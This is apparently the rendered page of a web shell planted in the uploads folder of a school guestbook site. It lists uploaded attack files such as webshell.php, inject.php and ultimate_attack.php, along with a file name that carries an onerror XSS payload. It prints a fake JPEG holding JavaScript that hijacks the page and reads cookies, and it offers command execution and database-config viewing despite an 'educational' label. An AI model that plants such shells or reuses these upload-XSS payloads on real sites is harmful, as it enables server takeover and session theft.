šŸš WEB SHELL ACTIVATED

šŸ“ File Browser

Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

šŸ“„ ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
šŸ“ ..
šŸ“„ 003b15869ae62d2ceeee451a5f652dd6.png [view]
šŸ“„ 0tk5j14v024b1.jpg [view]
šŸ“„ 300px-Cursed_Cat.jpg [view]
šŸ“„ 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
šŸ“„ Bill-Gates-Paul-Allen-2013.jpg [view]
šŸ“„ CV Jasper Kramp.png [view]
šŸ“„ Cat profile.png [view]
šŸ“„ Fronalpstock_big.jpg [view]
šŸ“„ Krik en las.jpg [view]
šŸ“„ Krik.jpg [view]
šŸ“„ Pino-dood-03.jpg [view]
šŸ“„ Shellz.php [view]
šŸ“„ Ted_Kaczynski_2_(cropped).jpg [view]
šŸ“„ Tux.svg.png [view]
šŸ“„ Z.png [view]
šŸ“„ android.jpg [view]
šŸ“„ apple.php [view]
šŸ“„ cianancatfish.jpg [view]
šŸ“„ downloads (1).jpeg [view]
šŸ“„ downloads.jpeg [view]
šŸ“„ epresso.jpg [view]
šŸ“„ fake_photo.png [view]
šŸ“„ hand.jpg [view]
šŸ“„ https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
šŸ“„ image.png [view]
šŸ“„ images.jpeg [view]
šŸ“„ info.php [view]
šŸ“„ inject.php [view]
šŸ“„ instant_redirect.jpg [view]
šŸ“„ japper.jpg [view]
šŸ“„ koekiemonster-3.jpg [view]
šŸ“„ logo.png [view]
šŸ“„ muis.jpg [view]
šŸ“„ people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
šŸ“„ picobellobv.jpeg [view]
šŸ“„ redirect.php [view]
šŸ“„ rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
šŸ“„ sdfsa.png [view]
šŸ“„ sneaky.svg [view]
šŸ“„ taylor.webp [view]
šŸ“„ test.html [view]
šŸ“„ testpreg.php [view]
šŸ“„ testpreg1.php [view]
šŸ“„ testtest.php.JPG [view]
šŸ“„ ultimate_attack.gif [view]
šŸ“„ ultimate_attack.php [view]
šŸ“„ ultimate_attack.svg [view]
šŸ“„ wallpaper.jpg [view]
šŸ“„ webshell.php [view]

šŸ“„ Viewing: ./instant_redirect.jpg

JFIF      
<script>
// INSTANT REDIRECT XSS ATTACK
alert('šŸšØ CRITICAL SECURITY BREACH! šŸšØ\n\nInstant XSS attack executed!\n\nRedirecting to demonstrate impact...');

// Show a dramatic hacking effect
document.body.style.background = 'black';
document.body.style.color = '#00ff00';
document.body.innerHTML = `
<div style="position: fixed; top: 0; left: 0; width: 100%; height: 100%; background: black; color: #00ff00; font-family: 'Courier New', monospace; padding: 20px; overflow: hidden; z-index: 999999;">
    <h1 style="text-align: center; font-size: 36px; margin-bottom: 20px;">ACCESS GRANTED</h1>
    <div id="hackText" style="font-size: 14px; line-height: 1.4;"></div>
</div>
`;

// Simulate hacking text effect
const hackingText = [
    'Initializing hack sequence...',
    'Bypassing security protocols...',
    'Accessing user database...',
    'Extracting session tokens...',
    'Downloading sensitive files...',
    'Uploading backdoor...',
    'Establishing persistent connection...',
    'SYSTEM COMPROMISED SUCCESSFULLY!',
    '',
    'šŸŽÆ ATTACK VECTOR: File Upload XSS',
    'šŸ’€ IMPACT: Full system access',
    'šŸ”“ STATUS: All security bypassed',
    '',
    'Redirecting to demonstrate complete control...'
];

let textIndex = 0;
const hackTextElement = document.getElementById('hackText');

function typeHackText() {
    if (textIndex < hackingText.length) {
        hackTextElement.innerHTML += hackingText[textIndex] + '<br>';
        textIndex++;
        setTimeout(typeHackText, 500);
    } else {
        // After hacking simulation, redirect
        setTimeout(() => {
            alert('šŸ”„ DEMONSTRATION COMPLETE! šŸ”„\n\nIn a real attack, you would now be redirected to:\n\nā€¢ Phishing site\nā€¢ Malware download\nā€¢ Data theft portal\n\nYour upload system is critically vulnerable!');
            
            // Restore original page (for demo purposes)
            location.reload();
        }, 2000);
    }
}

// Start the hacking simulation
setTimeout(typeHackText, 1000);

// Log the attack for educational purposes
console.log('šŸšØ XSS ATTACK LOG:');
console.log('File: instant_redirect.jpg');
console.log('Attack Type: Immediate JavaScript execution');
console.log('Payload: Page hijack + redirect demonstration');
console.log('Cookies accessible:', document.cookie);
console.log('User agent:', navigator.userAgent);
console.log('Current URL:', window.location.href);
</script>

<?php
// Fallback content in case JavaScript is disabled
echo '<noscript>';
echo '<h1 style="color: red;">XSS ATTACK EXECUTED!</h1>';
echo '<p>This JPEG file contains malicious JavaScript that would execute immediately.</p>';
echo '<p>JavaScript is disabled, but in a real scenario, this would:</p>';
echo '<ul>';
echo '<li>Steal your session cookies</li>';
echo '<li>Redirect you to malicious sites</li>';
echo '<li>Inject malicious content into the page</li>';
echo '<li>Steal any form data you enter</li>';
echo '</ul>';
echo '</noscript>';
?>

šŸŽÆ Available Actions

Command Execution:

Quick Commands:

šŸ“‹ List files | šŸ‘¤ Show user | šŸ“ Show directory | šŸ”„ Show processes | šŸ” Show users

File Operations:

ā¬†ļø Parent directory | šŸ  Root directory | šŸ” View DB config
āš ļø Educational Warning: This demonstrates a web shell vulnerability. In a real attack, this could allow complete server compromise!